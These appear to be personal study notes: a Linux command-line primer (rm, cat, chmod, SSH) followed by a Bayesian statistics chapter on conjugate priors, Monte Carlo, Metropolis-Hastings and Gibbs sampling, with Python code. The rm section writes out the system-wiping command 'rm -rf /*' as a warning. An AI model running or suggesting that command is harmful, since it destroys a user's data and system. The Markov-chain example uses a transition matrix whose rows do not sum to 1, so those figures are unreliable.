Remove a single file

    gz@ubuntu:~/Documents$ rm file1

-i / -I: remove with a confirmation prompt

    gz@ubuntu:~/Documents$ rm -i file2 file3 file4
    rm: remove regular empty file 'file2'? y
    rm: remove regular empty file 'file3'?
    rm: remove regular empty file 'file4'? y

-I only prompts when more than 3 files are being removed

    gz@ubuntu:~/Documents$ rm -I *
    rm: remove 6 arguments? y

-r or -R: delete a folder

    gz@ubuntu:~/Documents$ rm -r folder1

Wiping the disk and running away (never do this)

    rm -rf /*

rm: the remove command

r: recurse into directories

f: force, never prompt

/: the root directory

*: every file

nano: text editing

    gz@ubuntu:~/Documents$ nano t.py

    png

    png

cat (concatenate)

View a file's contents

    gz@ubuntu:~/Documents$ cat t.py
    print("Hello world!")
    print("This is a Python script!")

>: write one file's contents into another file

    gz@ubuntu:~/Documents$ cat t.py > t1.py

    png

>: bundle several files' contents into another file

    gz@ubuntu:~/Documents$ cat t.py t1.py > t2.py

    png

>>: append contents to the end of a file

    gz@ubuntu:~/Documents$ cat t3.py >> t2.py

    png

File permissions

ls -l: view file permissions

gz@ubuntu:~/Documents$ ls -l
total 16
-rw-rw-r-- 1 gz gz  56 Aug 11 22:17 t1.py
-rw-rw-r-- 1 gz gz 132 Aug 11 22:22 t2.py
-rw-rw-r-- 1 gz gz  20 Aug 11 22:21 t3.py
-rw-rw-r-- 1 gz gz  56 Aug 11 22:15 t.py

    png

• Type: there are many (most commonly - for a file and d for a directory; there are also l, n, and so on; look the rest up when you actually run into them, too many at once won't stick).

• User: the next three slots say what the owning User may do (r read; w write; x execute; - not allowed).

• Group: a Group holds one or more users; its permission slots follow the same pattern as User's.

• Others: permissions for everyone who is neither the User nor in the Group.

Take t1.py as an example

-rw-rw-r-- 1 gz gz  56 Aug 11 22:17 t1.py

-: a file; rw-: the user may read and write, not execute; rw-: group members may read and write, not execute; r--: others may only read

chmod: changing permissions

Try running t1.py

    gz@ubuntu:~/Documents$ python3 t1.py
    Hello world!
    This is a Python script!

But run directly like this, t1.py is blocked for lack of execute permission

    gz@ubuntu:~/Documents$ ./t1.py
    bash: ./t1.py: Permission denied

Give t1.py execute permission

    gz@ubuntu:~/Documents$ chmod u+x t1.py

[who]

• u: change for the User
• g: change for the Group
• o: change for Others
• a: (all) change for everyone

[how]

• +, -, =: add, remove, or set exactly the given permissions
• r, w, x, or several at once, e.g. rx (octal modes express the same thing numerically; see the sketch below)
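Octal modes encode the same rwx triplets as numbers; Python's standard-library stat module can decode them (a small sketch of mine, not from the course):

import stat

mode = 0o100754  # 0o100000 marks a regular file; 754 = rwx r-x r--
print(stat.filemode(mode))      # -rwxr-xr--
print(oct(stat.S_IMODE(mode)))  # 0o754, the permission bits alone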

A Python trick

Add this at the top of t1.py

    #!/usr/bin/python3

With execute permission it can then be run like this:

    gz@ubuntu:~/Documents$ ./t1.py
    Hello world!
    This is a Python script!

    png

Without the shebang, execution fails:

    gz@ubuntu:~/Documents$ ./t1.py
    ./t1.py: line 1: syntax error near unexpected token `"Hello world!"'
    ./t1.py: line 1: `print("Hello world!")'

Remote control

SSH into Linux from macOS/Windows or another Linux machine

On Windows:

ssh [user]@[ip address of the Linux machine]

Check the machine's IP on Linux (the ifconfig command; on Windows it's ipconfig... and here I thought I had misspelled it)

    gz@ubuntu:~$ ifconfig
    ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
    inet 192.168.89.130 netmask 255.255.255.0 broadcast 192.168.89.255
inet6 fe80::8565:1325:bab3:8017 prefixlen 64 scopeid 0x20<link>
    ether 00:0c:29:95:09:31 txqueuelen 1000 (Ethernet)
    RX packets 27262 bytes 18561854 (18.5 MB)
    RX errors 0 dropped 0 overruns 0 frame 0
    TX packets 15044 bytes 2133723 (2.1 MB)
    TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

    lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
    inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
    loop txqueuelen 1000 (Local Loopback)
    RX packets 4135 bytes 456719 (456.7 KB)
    RX errors 0 dropped 0 overruns 0 frame 0
    TX packets 4135 bytes 456719 (456.7 KB)
    TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

    (192.168.89.130)

    png

SSH into Linux from a phone (Android/iOS)

Search for "JuiceSSH" in the app store

Remote-controlling a computer with TeamViewer or VNC

TeamViewer: works across the public internet, demands good bandwidth

VNC: suited to a local network

Machine learning in the cloud

Never mind; I'll tinker with that some other time...

    ]]>
    @@ -9888,7 +9888,7 @@ /posts/Python-%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD%E6%95%B0%E5%AD%A6%E5%9F%BA%E7%A1%8017/ - Python-人工智能数学基础 17

17 Bayesian Analysis

17.1 Overview of Bayesian analysis

17.1.2 The debate between the Bayesian and classical schools

Statistical inference draws conclusions about a population's distribution, or its parameters, from sample information. That is how the classical school frames inference, using two kinds of information: population information and sample information. The Bayesian school holds that inference should also use a third kind: prior information

    $$P(\color{red}\theta|\color{blue}y)$$

The classical (frequentist) school
• Observed data are treated as random: they are realizations of a random process and change every time the system is observed.

• Model parameters are treated as fixed: their values are unknown, but fixed, so we condition on them.

The Bayesian school
• Data are treated as fixed: the process that produced them was random, but once collected they do not change.

• Bayesians describe uncertainty about model parameters with probability distributions, so the parameters themselves are random.

17.1.3 Bayes' formula

• Formula:

$$P(B_i|A)=\frac{P(A|B_i)P(B_i)}{P(A)}=\frac{P(A|B_i)P(B_i)}{\sum^n_{j=1}P(A|B_j)P(B_j)}, \quad i=1, 2, \dots, n$$

• Estimation (discrete):

$$\pi(\theta_i|x)=\frac{f(x|\theta_i)\pi(\theta_i)}{\sum_i f(x|\theta_i)\pi(\theta_i)}$$

• Estimation (continuous):

    $$\pi(\theta|x)=\frac{f(x|\theta)\pi(\theta)}{\int_\Theta f(x|\theta)\pi(\theta)d\theta}$$

17.1.4 Reading the pieces of the formula

1 Prior information and the prior distribution

What we believe about the problem before sampling, written $\pi(\theta)$

2 The posterior distribution

Once the sample information $x$ is in hand, our knowledge of the parameter $\theta$ changes; the updated belief about $\theta$ is called the posterior, written $\pi(\theta|x)$

3 Conjugate priors

Choosing a prior is subjective; the usual choices are non-informative priors and conjugate priors

If the posterior $\pi(\theta|x)$ obtained from the sample $x$ belongs to the same family of distributions as the prior density $\pi(\theta)$, then $\pi(\theta)$ is called a conjugate prior for the parameter $\theta$

    走进贝叶斯统计(二)—— 共轭先验分布

Example 17.2 (a conjugate pair: Beta prior, Bernoulli/binomial likelihood)

Let $x$ be the number of occurrences of event $A$, each with probability $\theta$, in $n$ independent trials run to estimate $\theta$

Clearly $x\sim B(n, \theta)$ (binomial), which gives the likelihood:

$$f(x|\theta)=C_n^x\theta^x(1-\theta)^{n-x}$$

Take a uniform prior $U(0,1)$, i.e. $\pi(\theta)=1$ for $\theta\in(0,1)$

Bayes' formula then gives the posterior:

$$\pi(\theta|x)=\frac{\Gamma(n+2)}{\Gamma(x+1)\Gamma(n-x+1)}\theta^{(x+1)-1}(1-\theta)^{(n-x+1)-1}$$

This is a Beta distribution with parameters $x+1$ and $n-x+1$, written $\mathrm{Beta}(x+1, n-x+1)$

E.g. toss a coin 10 times ($n=10$) and get 5 heads, 5 tails ($x=5$): the posterior is $\mathrm{Beta}(6,6)$, whose mean is 0.5 (for $\mathrm{Beta}(\alpha, \beta)$ the mean is $E(X)=\frac{\alpha}{\alpha+\beta}$); see the quick check below
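A two-line check of that posterior with scipy (my addition):

from scipy import stats

posterior = stats.beta(5 + 1, 10 - 5 + 1)  # Beta(x+1, n-x+1) with n=10, x=5
print(posterior.mean())  # 0.5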

    如何通俗并深刻的理解 beta 分布

Example 17.3

Run 4 coin-toss experiments of 20 tosses each, observing 0, 5, 10, and 20 heads respectively, and watch how the different samples update the prior. The prior is $\mathrm{Beta}(1, 1)$ (as if 0 heads in 0 tosses so far?)

import matplotlib.pyplot as plt
import scipy.stats as stats
import numpy as np

plt.rcParams['font.sans-serif'] = ['Microsoft YaHei']
plt.rcParams['axes.unicode_minus'] = False

theta_real = 1  # (unused below)
# 4 coin-toss experiments, 20 tosses each, with 0, 5, 10, 20 heads observed
trials = [20, 20, 20, 20]
data = [0, 5, 10, 20]
beta_params = [(1, 1)]
dist = stats.beta  # dist is the Beta distribution
x = np.linspace(0, 1, 100)
# enumerate() pairs every element of an iterable (list, tuple, string, ...)
# with its index, which is convenient inside for loops.
for idx, N in enumerate(trials):
    plt.subplot(2, 2, idx + 1)
    y = data[idx]
    for (a_prior, b_prior), c in zip(beta_params, ('b',)):
        # posterior density
        p_theta_given_y = dist.pdf(x, a_prior + y, b_prior + N - y)
        plt.plot(x, p_theta_given_y, c)
        plt.fill_between(x, 0, p_theta_given_y, color=c, alpha=0.6)
    # prior density
    plt.plot(x, stats.beta.pdf(x, 1, 1), color='r', linestyle='--',
             linewidth=1, alpha=0.5)
    plt.plot(0, 0, label='{:d} tosses\n{:d} heads'.format(N, y), alpha=0)
    plt.xlim(0, 1)
    plt.ylim(0, 12)
    plt.xlabel(r'parameter $\theta$')
    plt.legend()
    plt.gca().axes.get_yaxis().set_visible(False)
plt.tight_layout()
plt.show()

    png

Example 17.4

The same product is sold by two different sellers on Taobao:

• Seller A has 10 reviews: 9 positive and 1 negative

• Seller B has 500 reviews: 400 positive and 100 negative

Which seller should you buy from?

Solution: take the prior to be $\mathrm{Beta}(1,1)$. The review counts follow a binomial distribution, whose conjugate prior is the Beta distribution, with $a=1, b=1$.

For seller A the number of trials is $n=10$ with $x=9$ successes, so A's posterior is $\mathrm{Beta}(10, 2)$

Seller B's posterior is $\mathrm{Beta}(401, 101)$

import matplotlib.pyplot as plt
import scipy.stats as stats
import numpy as np

plt.rcParams['font.sans-serif'] = ['Microsoft YaHei']
plt.rcParams['axes.unicode_minus'] = False

x = np.linspace(0, 1, 100)
plt.plot(x, stats.beta.pdf(x, 10, 2), color='b', linestyle='-', linewidth=2)
plt.plot(x, stats.beta.pdf(x, 401, 101), color='g', linestyle='-.', linewidth=2)
plt.legend(('Seller A', 'Seller B'), loc='best')
plt.show()

    png

A Beta distribution can be read as a probability distribution over a probability. Seller A's positive-review probability has the higher mean, but also the larger variance

The mean $E(X)$ of $\mathrm{Beta}(\alpha, \beta)$:

$$E(X)=\frac{\alpha}{\alpha + \beta}$$

The variance $D(X)$:

$$D(X)=\frac{\alpha\beta}{(\alpha+\beta)^2(\alpha + \beta + 1)}$$
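To make the "higher mean but larger variance" claim concrete, a small sketch (mine, not the book's) evaluating both posteriors with the formulas above:

# Compare the two posteriors' means and variances
import scipy.stats as stats

for name, (a, b) in [('A', (10, 2)), ('B', (401, 101))]:
    mean = a / (a + b)                              # E(X) = alpha / (alpha + beta)
    var = a * b / ((a + b) ** 2 * (a + b + 1))      # D(X) formula above
    print(name, mean, var, stats.beta(a, b).var())  # SciPy agrees with the formula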

    高斯-高斯共轭

17.2 An Overview of MCMC (Markov Chain Monte Carlo)

Bayes' formula is concise and intuitive, and it matches the way we understand things.

In Bayesian analysis we often need numeric summaries of the posterior, such as its expectation and variance. If the prior is not conjugate, the posterior is usually not a standard distribution, and computing it involves very complicated integrals that in most cases cannot be evaluated exactly

Building on Markov chain theory, the MCMC method uses Monte Carlo simulation to sidestep the complicated closed-form computation of the posterior: it simulates random samples from the posterior directly, then obtains the mean and other statistics by analyzing the simulated samples.

17.2.1 The Monte Carlo method

    刘建平 Pinard-MCMC(一)蒙特卡罗方法

Many problems are hard to solve, or cannot even be written down exactly, but they can be approximated by sampling; this is the basic idea of the Monte Carlo method.

Let $X$ be a random variable following the distribution $p(x)$. When computing an expectation under $p(x)$, we only need enough draws: with a large enough sample, the average comes very close to the true value
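For instance, a minimal Monte Carlo expectation (my example, reusing the Beta(6, 6) posterior from example 17.2):

# Monte Carlo estimate of E[X] for X ~ Beta(6, 6)
import numpy as np
import scipy.stats as stats

samples = stats.beta.rvs(6, 6, size=100_000)
print(samples.mean())  # close to the exact mean 0.5; improves as the sample grows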

Example 17.5: estimating pi by random simulation

To estimate $\pi$ by simulation, inscribe a circle in a square and generate a large number of random points inside the square; the ratio of the number of points falling inside the circle to the number inside the square approximates $\pi/4$, which yields an estimate of $\pi$

import matplotlib.pyplot as plt
import numpy as np

N = 10000
x, y = np.random.uniform(-1, 1, size=(2, N))  # 10000 uniform points in the square [-1, 1] x [-1, 1]
inside = (x ** 2 + y ** 2) <= 1  # inside the circle
pi = inside.sum() * 4 / N  # estimate of pi
error = abs((pi - np.pi) / pi) * 100  # error rate in %
outside = np.invert(inside)  # invert the boolean mask
plt.plot(x[inside], y[inside], 'b.')
plt.plot(x[outside], y[outside], 'r.')
plt.plot(0, 0, label='$\\hat \\pi$ = {:4.3f}\nerror = {:4.3f}%'.format(pi, error), alpha=0)
plt.axis('square')
plt.legend(frameon=True, framealpha=0.9, fontsize=16)
plt.show()

    png

In Bayesian methods, Monte Carlo sampling of the data lets us avoid computing the posterior in closed form (estimating probability by frequency)

But if the distribution of X is not a common one, we cannot obtain samples from it directly

To make up for this shortcoming of direct sampling, von Neumann proposed the accept-reject (rejection) sampling method

Rejection sampling takes a detour: since $p(x)$ is too complex to sample directly in a program, pick an easy-to-sample reference distribution $q(x)$ satisfying $p(x)\le Mq(x)$, then reject some of the samples according to a rule; the samples that remain follow the target distribution $p(x)$

    拒绝采样(reject sampling)原理详解

Example 17.6: generate samples from the standard normal distribution with rejection sampling

Solution: take the uniform density on [-4, 4] as the reference distribution $q(x)$, with the constant $M=3.5$

import numpy as np
import matplotlib.pyplot as plt
import math


def p(x):
    """Standard normal density"""
    mu = 0
    sigma = 1
    return 1 / (math.pi * 2) ** 0.5 / sigma * np.exp(-(x - mu) ** 2 / 2 / sigma ** 2)


def q(x):
    """Reference distribution: the uniform density on [-4, 4]"""
    return np.array([0.125 for i in range(len(x))])


x = np.linspace(-4, 4, 500)
M = 3.5
N = 1000  # number of samples
"""
Set the sample count i = 1
Repeat until i = N
(1) draw a sample x from the reference distribution q(x)
(2) draw u from the uniform distribution on [0, 1]
(3) if u <= p(x) / (M q(x)), accept x and increment i; otherwise discard x
The accepted samples X can be shown to follow the distribution p(x)
"""
i = 1
count = 0
samples = np.array([])
while i < N:
    u = np.random.rand(10)  # evaluate 10 candidates at a time; u ~ U(0, 1)
    x = (np.random.rand(10) - 0.5) * 8  # candidates uniform on [-4, 4]
    res = u < (p(x) / (q(x) * M))
    if any(res):  # accept the candidates that pass the test, discard the rest
        samples = np.hstack((samples, x[res]))
        i += len(x[res])
    count += 10
count -= len(samples) - 1000
samples = samples[:1000]  # (keep only the first 1000? I don't see what this line is for)
x = np.linspace(-4, 4, 500)
plt.plot(x, p(x))
plt.hist(samples, 100, density=True, facecolor='blue')
plt.title('Rejection Sampling', fontsize=24)
plt.xlabel('x', fontsize=14)
plt.ylabel('p(x)', fontsize=14)
plt.show()
print(N / count)

    png

    0.2864508736751647

17.2.2 Markov Chains

A Markov chain has a fairly simple definition: it assumes that the transition probability at any moment depends only on the previous state

The three core ingredients of a Markov chain: 1. a state space 2. memorylessness 3. a transition matrix

    刘建平 Pinard-MCMC(二)马尔科夫链

    【数之道 18】"马尔可夫链"是什么?了解它只需 5 分钟!

Example 17.7

A car-rental chain has 3 stores, and a car can be rented from and returned to any of them. The probabilities of renting at one store and returning at another are given below

| Rent \ Return | Store 1 | Store 2 | Store 3 |
| --- | --- | --- | --- |
| Store 1 | 0.5 | 0.3 | 0.3 |
| Store 2 | 0.2 | 0.1 | 0.6 |
| Store 3 | 0.3 | 0.6 | 0.1 |

For example, the probability that a car rented at store 1 is returned at store 2 is 0.15 (so the book says; I believe it should be 0.3). If a car is rented from store 2, which store should the company check on each of the next 3 returns to find it fastest?

Solution: the rent/return probabilities can be written as a transition matrix $\mathbf{P}$

$$
\mathbf{P}=\begin{bmatrix}
0.5 & 0.3 & 0.3 \\
0.2 & 0.1 & 0.6 \\
0.3 & 0.6 & 0.1
\end{bmatrix}
$$

The car's initial distribution is $\pi_0=\left[\pi_0(1),\pi_0(2),\pi_0(3)\right]=\left[0, 1, 0\right]$ (rented from store 2)

The distribution over stores at the first return is $\pi_1=\pi_0\mathbf{P}$

At the second return it is $\pi_2=\pi_1\mathbf{P}$

and so on: at the $n$-th return it is $\pi_n=\pi_{n-1}\mathbf{P}$

The sequence of return-store distributions $\pi_t$ over time forms a Markov chain

import numpy as np

# transition matrix
matrix = np.matrix([[0.5, 0.3, 0.3], [0.2, 0.1, 0.6], [0.3, 0.6, 0.1]])
vector1 = np.matrix([[0, 1, 0]], dtype=float)
for i in range(30):
    vector1 = vector1 * matrix  # next state = current state * transition matrix
    print("Current round:", i + 1)
    print(vector1)
Current round: 1  [[0.2 0.1 0.6]]
Current round: 2  [[0.3  0.43 0.18]]
Current round: 3  [[0.29  0.241 0.366]]
Current round: 4  [[0.303  0.3307 0.2682]]
Current round: 5  [[0.2981  0.28489 0.31614]]
Current round: 6  [[0.30087  0.307603 0.291978]]
Current round: 7  [[0.299549  0.2962081 0.3040206]]
Current round: 8  [[0.3002223  0.30189787 0.29799162]]
Current round: 9  [[0.29988821 0.29905145 0.30100457]]
Current round: 10 [[0.30005577 0.30047435 0.29949779]]
Current round: 11 [[0.29997209 0.29976284 0.30025112]]
Current round: 12 [[0.30001395 0.30011858 0.29987444]]
Current round: 13 [[0.29999302 0.29994071 0.30006278]]
Current round: 14 [[0.30000349 0.30002965 0.29996861]]
Current round: 15 [[0.29999826 0.29998518 0.30001569]]
Current round: 16 [[0.30000087 0.30000741 0.29999215]]
Current round: 17 [[0.29999956 0.29999629 0.30000392]]
Current round: 18 [[0.30000022 0.30000185 0.29999804]]
Current round: 19 [[0.29999989 0.29999907 0.30000098]]
Current round: 20 [[0.30000005 0.30000046 0.29999951]]
Current round: 21 [[0.29999997 0.29999977 0.30000025]]
Current round: 22 [[0.30000001 0.30000012 0.29999988]]
Current round: 23 [[0.29999999 0.29999994 0.30000006]]
Current round: 24 [[0.3        0.30000003 0.29999997]]
Current round: 25 [[0.3        0.29999999 0.30000002]]
Current round: 26 [[0.3        0.30000001 0.29999999]]
Current round: 27 [[0.3 0.3 0.3]]
Current round: 28 [[0.3 0.3 0.3]]
Current round: 29 [[0.3 0.3 0.3]]
Current round: 30 [[0.3 0.3 0.3]]

$\pi_1 = \left[0.2, 0.1, 0.6\right]$: pick the most probable store, so check store 3 first

$\pi_2 = \left[0.3, 0.43, 0.18\right]$: check store 2 the second time

$\pi_3 = \left[0.29, 0.241, 0.366\right]$: check store 3 the third time
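The iteration above settles at $[0.3, 0.3, 0.3]$; a sketch (not from the book) that recovers this stationary distribution directly, as the eigenvector of $\mathbf{P}^T$ for eigenvalue 1:

# Stationary distribution as the eigenvector of P.T with eigenvalue 1
import numpy as np

P = np.array([[0.5, 0.3, 0.3], [0.2, 0.1, 0.6], [0.3, 0.6, 0.1]])
vals, vecs = np.linalg.eig(P.T)  # pi P = pi is equivalent to P.T pi = pi
pi = np.real(vecs[:, np.argmax(np.real(vals))])  # eigenvalue 1 is the largest here
pi /= pi.sum()  # normalize to a probability vector
print(pi)  # approximately [0.3, 0.3, 0.3]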

17.3 MCMC Sampling

    刘建平 Pinard-MCMC(三)MCMC 采样和 M-H 采样

    【数之道】马尔可夫链蒙特卡洛方法是什么?十五分钟理解这个数据科学难点

MCMC sampling: let the current sample point be $x$ and the next candidate be $x^*$

Definition 17.3: if an aperiodic Markov chain with transition kernel $q(x^*|x)$ and a probability distribution $p(x)$ satisfy:

$$\color{Blue}{p(x)}\color{Red}{q(x^*|x)}=\color{Blue}{p(x^*)}\color{Red}{q(x|x^*)}$$

then $\color{Blue}{p(x)}$ is a stationary distribution of the chain; the equation is called the detailed balance condition

Definition 17.4: in general, however, the target stationary distribution and an arbitrary transition kernel do not satisfy detailed balance:

$$\color{Blue}{p(x)}\color{Red}{q(x^*|x)}\ne\color{Blue}{p(x^*)}\color{Red}{q(x|x^*)}$$

We can introduce an acceptance function $\color{Green}{\alpha(x, x^*)}$ such that:

$$\color{Blue}{p(x)}\color{Red}{q(x^*|x)}\color{Green}{\alpha(x, x^*)}=\color{Blue}{p(x^*)}\color{Red}{q(x|x^*)}\color{Green}{\alpha(x^*, x)}$$

where $\color{Green}{\alpha(x^*,x)}=\color{Blue}{p(x)}\color{Red}{q(x^*|x)}$ and $\color{Green}{\alpha(x,x^*)}=\color{Blue}{p(x^*)}\color{Red}{q(x|x^*)}$

The MCMC algorithm:

1. Input: any Markov chain transition kernel $Q$, the target stationary distribution $\pi(x)$, a burn-in threshold $n_1$, and the number of samples needed $n_2$

2. Draw an initial state $x_0$ from any simple distribution

3. for $t=0$ to $n_1 + n_2 - 1$:

  a. draw a candidate $x^*$ from the conditional distribution $Q(x|x_t)$

  b. draw $u$ from the uniform distribution $U\left[0,1\right]$

  c. if $u<\alpha(x_t,x^*) = \pi(x^*)Q(x^*,x_t)$: accept the move $x_t\to x^*$, i.e. $x_{t+1}=x^*$

  d. else: reject the move, $t=\max\{t-1, 0\}$

But the acceptance rate $\alpha(x,x^*)$ along the way can be quite small, so the chain converges to the stationary distribution $p(x)$ too slowly; the M-H algorithm was proposed as an improvement

The M-H algorithm (a minimal sketch of a single step follows this list)

1. Input: any Markov chain transition kernel $Q$, the target stationary distribution $\pi(x)$, a burn-in threshold $n_1$, and the number of samples needed $n_2$

2. Draw an initial state $x_0$ from any simple distribution

3. for $t=0$ to $n_1 + n_2 - 1$:

  a. draw a candidate $x^*$ from the conditional distribution $Q(x|x_t)$

  b. draw $u$ from the uniform distribution $U\left[0,1\right]$

  c. if $u<\alpha(x_t,x^*) \color{Brown}{=\min\left\{\frac{\pi(x^*)Q(x^*, x_t)}{\pi(x_t)Q(x_t, x^*)},1\right\}}$ (the larger of the two sides is scaled up to 1): accept $x_t\to x^*$, i.e. $x_{t+1}=x^*$

  d. else: reject the move, $t=\max\{t-1, 0\}$
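A minimal sketch of one M-H step (my own, assuming a symmetric normal random-walk proposal, for which the $Q$ ratio cancels; example 17.8 below is the book's full version):

# One Metropolis-Hastings step with a symmetric proposal q(x*|x) = Normal(x, 1)
import numpy as np

def mh_step(x_t, target_pdf, rng=np.random.default_rng()):
    x_star = rng.normal(x_t, 1.0)  # draw candidate from q(x*|x_t)
    alpha = min(1.0, target_pdf(x_star) / target_pdf(x_t))  # acceptance probability
    return x_star if rng.uniform() < alpha else x_t  # accept, or stay put

# usage: sample a standard normal (unnormalized density is enough)
chain = [0.0]
pdf = lambda x: np.exp(-x ** 2 / 2)
for _ in range(5000):
    chain.append(mh_step(chain[-1], pdf))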

Example 17.8: sampling the Rayleigh distribution with the M-H algorithm

The density of the Rayleigh distribution is:

$$f(x)=\frac{x}{\sigma^2}\exp\left(-\frac{x^2}{2\sigma^2}\right), x\ge 0, \sigma>0$$

Solution:

Choice of the proposal $q(i, j)$: a chi-squared distribution with $df=x_t$

Target distribution: the Rayleigh distribution with $\sigma=4$

1 Sample the Rayleigh distribution with M-H, using a chi-squared proposal with $x_t$ degrees of freedom
import numpy as np
import matplotlib.pyplot as plt
import scipy.stats as stats
import math


def Rayleigh(x, sigma):
    """Rayleigh density"""
    if x < 0:
        return 0
    elif sigma > 0:
        return (x / sigma ** 2) * np.exp(-x ** 2 / (2 * sigma ** 2))


m = 10000
sigma = 4
x = [0.00 for i in range(m)]  # a sequence of 10000 zeros
# initial state drawn from a chi-squared distribution
x[1] = stats.chi2.rvs(df=1)
k = 0
for i in range(2, m):
    xt = x[i - 1]
    x_star = stats.chi2.rvs(df=math.ceil(xt))
    num = Rayleigh(x_star, sigma) * stats.chi2.pdf(xt, df=math.ceil(x_star))
    den = Rayleigh(xt, sigma) * stats.chi2.pdf(x_star, df=math.ceil(xt))
    u = np.random.uniform(0, 1)  # draw u from the uniform distribution
    if u <= min(1, num / den):
        x[i] = x_star  # accept the move
    else:
        x[i] = xt
        k = k + 1
print("Number of rejected samples:", k)
Number of rejected samples:  3408
2 Plot part of the chain's sample path and a histogram of the simulated samples
index = [number for number in range(5000, 5500)]
y1 = x[5000:5500]
fig1 = plt.figure(num='fig1', figsize=(10, 3))
# part of the chain's sample path
plt.plot(index, y1)
fig2 = plt.figure(num='fig2', figsize=(6, 3))
b = 2001  # discard the samples drawn before the chain reached its stationary state
y = x[b:m]
# curve of the Rayleigh density
plt.scatter(y, [Rayleigh(i, 4) for i in y], color='red', linewidth=1)
# histogram of the samples
plt.hist(y, 25, density=True, facecolor='white', edgecolor='black', alpha=1)
plt.show()

    png

    png

17.4 Gibbs Sampling

    浅谈「Gibbs 采样」

    An introduction to Gibbs sampling (Youtube)

A method for sampling from two- (or higher-) dimensional probability distributions

For any two points $A(x_A, y_A)$ and $B(x_B, y_B)$ in the plane, construct the following transition probabilities:

$$\mathbf{p}(B|A)=\left\{\begin{matrix}
P(y_B|x_1), & x_A=x_B=x_1 \\
P(x_B|y_1), & y_A=y_B=y_1 \\
0, & \text{otherwise}
\end{matrix}\right.$$

With this transition kernel, any two points $A$ and $B$ in the plane satisfy the detailed balance condition $\pi(A)P(B|A)=\pi(B)P(A|B)$, so the Markov chain converges to the stationary distribution $\pi(X)$

For example, given the joint distribution of A and B:

| B \ A | 0 | 1 |
| --- | --- | --- |
| 0 | 0.1 | 0.4 |
| 1 | 0.3 | 0.2 |

the conditional (transition) probabilities $P(A|B)$ are:

| B \ A | 0 | 1 |
| --- | --- | --- |
| 0 | 0.1 / (0.1 + 0.4) = 0.2 | 0.4 / (0.1 + 0.4) = 0.8 |
| 1 | 0.3 / (0.3 + 0.2) = 0.6 | 0.2 / (0.3 + 0.2) = 0.4 |

and the conditional probabilities $P(B|A)$ are:

| B \ A | 0 | 1 |
| --- | --- | --- |
| 0 | 0.1 / (0.1 + 0.3) = 0.25 | 0.4 / (0.4 + 0.2) = 2 / 3 |
| 1 | 0.3 / (0.1 + 0.3) = 0.75 | 0.2 / (0.4 + 0.2) = 1 / 3 |

(a small numeric check of detailed balance for this example follows below)
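As promised, a numeric check (mine) that these tables satisfy detailed balance $\pi(A)P(B|A)=\pi(B)P(A|B)$:

# Detailed balance check for the discrete example above
import numpy as np

joint = np.array([[0.1, 0.4],   # rows: B = 0, 1; columns: A = 0, 1
                  [0.3, 0.2]])
P_A_given_B = joint / joint.sum(axis=1, keepdims=True)  # normalize each row
P_B_given_A = joint / joint.sum(axis=0, keepdims=True)  # normalize each column
pi_A = joint.sum(axis=0)  # marginal distribution of A
pi_B = joint.sum(axis=1)  # marginal distribution of B
# pi(A) P(B|A) should equal pi(B) P(A|B) entry by entry
print(np.allclose(pi_A[None, :] * P_B_given_A, pi_B[:, None] * P_A_given_B))  # True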

The two-dimensional Gibbs sampling algorithm:

(1) initialize the states $x_0$ and $y_0$ at random

(2) sample in a loop (at step $t$):

① $y_{t+1}\sim p(y|x_t)$

② $x_{t+1}\sim p(x|y_{t+1})$

Example 17.9: sampling a two-dimensional normal distribution with Gibbs sampling

Use Gibbs sampling to sample from a bivariate normal $Norm(\mu, \Sigma)$ with means $\mu_1=\mu_2=0$, standard deviations $\sigma_1=8, \sigma_2=2$, and correlation coefficient $\rho=0.5$. The transition (conditional) distributions are:

$$P(x_1|x_2)=Norm\left[\mu_1+\rho\frac{\sigma_1}{\sigma_2}(x_2-\mu_2), (1-\rho^2)\sigma^2_1\right]$$

$$P(x_2|x_1)=Norm\left[\mu_2+\rho\frac{\sigma_2}{\sigma_1}(x_1-\mu_1), (1-\rho^2)\sigma^2_2\right]$$

import pylab as pl
import numpy as np
import math

sigma_x = 8  # standard deviation of the normal along x
sigma_y = 2  # standard deviation of the normal along y
cov = 0.5  # correlation coefficient between x and y


def pdf_gaussian_x(x):
    """Marginal density along x"""
    return (1 / (math.sqrt(2 * math.pi) * sigma_x)) * math.exp(-math.pow(x, 2) / (2 * math.pow(sigma_x, 2)))


def pxgiveny(y):
    """Conditional distribution p(x|y)"""
    return np.random.normal(y * (sigma_x / sigma_y) * cov, sigma_x * math.sqrt(1 - cov * cov))


def pygivenx(x):
    """Conditional distribution p(y|x)"""
    return np.random.normal(x * (sigma_y / sigma_x) * cov, sigma_y * math.sqrt(1 - cov * cov))


def gibbs(N_hop):
    # initialize the x and y states at random
    x_states = []
    y_states = []
    x = np.random.uniform()
    y = np.random.uniform()
    for _ in range(N_hop):
        x = pxgiveny(y)  # sample x given y
        y = pygivenx(x)  # sample y given x
        x_states.append(x)
        y_states.append(y)
    return x_states[-1000:], y_states[-1000:]


def plot_gibbs():
    # Gibbs sampling
    x_sample, y_sample = gibbs(100000)
    fig1 = pl.figure(num='fig1', figsize=(10, 3), dpi=75, facecolor='#FFFFFF', edgecolor='#0000FF')
    x1 = np.arange(-30, 30, 1)
    # histogram of the samples along the x dimension
    pl.hist(x_sample, density=True, bins=x1, histtype='step', label="Simulated_Gibbs")
    px1 = np.zeros(len(x1))
    for i in range(len(x1)):
        px1[i] = pdf_gaussian_x(x1[i])
    # density curve
    pl.plot(x1, px1, label="Real Distribution")
    pl.legend()
    fig2 = pl.figure(num='fig2', figsize=(10, 3), dpi=75, facecolor='#FFFFFF', edgecolor='#0000FF')
    # scatter plot of the samples
    pl.scatter(x_sample, y_sample, alpha=.75, cmap='gray_r')
    pl.show()

plot_gibbs()

    png

    png

17.5 Worked Example: Simulating Samples from a Posterior with PyMC3

17.5.1 Simulating the sample distribution

Example 17.10

The worked example in section 8.7 estimated the distribution parameter $\mu$ by maximum likelihood; here we switch to the Bayesian approach and use the PyMC3 package to draw random samples from the posterior distribution of $\mu$

$$\color{Red}{P(\mu|Data)}=\frac{\color{Blue}{P(Data|\mu)}\color{Green}{P(\mu)}}{\color{Purple}{P(Data)}}$$

posterior = likelihood * prior / marginal likelihood

    png
